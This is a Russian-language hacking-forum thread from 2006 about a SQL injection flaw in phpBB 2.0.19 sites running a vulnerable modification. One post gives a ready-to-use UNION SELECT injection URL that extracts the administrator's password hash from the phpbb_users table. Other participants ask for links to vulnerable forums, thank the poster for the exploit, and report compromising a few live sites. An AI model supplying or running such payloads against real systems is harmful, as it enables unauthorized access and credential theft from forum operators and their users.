HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 06.02.2006, 20:36
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию

Dron-anarchy походу тока на 19!а жаль)))
 
Ответить с цитированием

  #2  
Старый 06.02.2006, 21:32
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

ну а вам какая разница нах?=)) тем более на многих стоит 19)) да действительно там ошыпка имхо могли бы и из линка взять тоже мине ) и за репу многим спасиБо+)
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
 
Ответить с цитированием

  #3  
Старый 06.02.2006, 22:11
karapuz
Новичок
Регистрация: 06.03.2005
Сообщений: 16
Провел на форуме:
21674

Репутация: 2
По умолчанию

сорри скиньте в пм линк на бажный форум, для теста...

Последний раз редактировалось karapuz; 06.02.2006 в 22:27..
 
Ответить с цитированием

  #4  
Старый 06.02.2006, 22:14
D1mOn
Постоянный
Регистрация: 02.10.2005
Сообщений: 490
Провел на форуме:
2333839

Репутация: 212
По умолчанию

Код:
index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null,null  ,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2/*
Вот это вручную!!!
 
Ответить с цитированием

  #5  
Старый 06.02.2006, 22:34
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

причём, уберите пробелы лишние в запросе, когда писать его будете! Fr Om - это From! =)
 
Ответить с цитированием

  #6  
Старый 06.02.2006, 22:44
karapuz
Новичок
Регистрация: 06.03.2005
Сообщений: 16
Провел на форуме:
21674

Репутация: 2
По умолчанию

все разобрался спасибо, но форумов маловато =(
 
Ответить с цитированием

  #7  
Старый 06.02.2006, 23:51
Inferno
Участник форума
Регистрация: 30.12.2005
Сообщений: 155
Провел на форуме:
2714612

Репутация: 31
По умолчанию

За сплойт спасибки ручками юзается на отлично :d
Только реально я нарыл токо пару форумов которые ломаются а остальные никак!
 
Ответить с цитированием

  #8  
Старый 07.02.2006, 00:45
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

Inferno - Значит версии Другии =)) Рузами всегда хорошо работаеться =)) Чем бажными Скриптами =))
 
Ответить с цитированием

  #9  
Старый 07.02.2006, 01:41
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

m0nzt3r спасибо за исправление ошибки)
 
Ответить с цитированием

  #10  
Старый 07.02.2006, 01:55
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию

Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit TANZWUT Сценарии/CMF/СMS 4 10.06.2008 20:18
PhpBB 2.0.15 Database Authentication Details Exploit VARVAR Сценарии/CMF/СMS 11 01.02.2007 12:21
Новая XSS на форуме phpBB 2.0.19 NeMiNeM Сценарии/CMF/СMS 6 26.10.2006 21:30
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit Rebz Уязвимости 4 28.02.2006 19:45



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ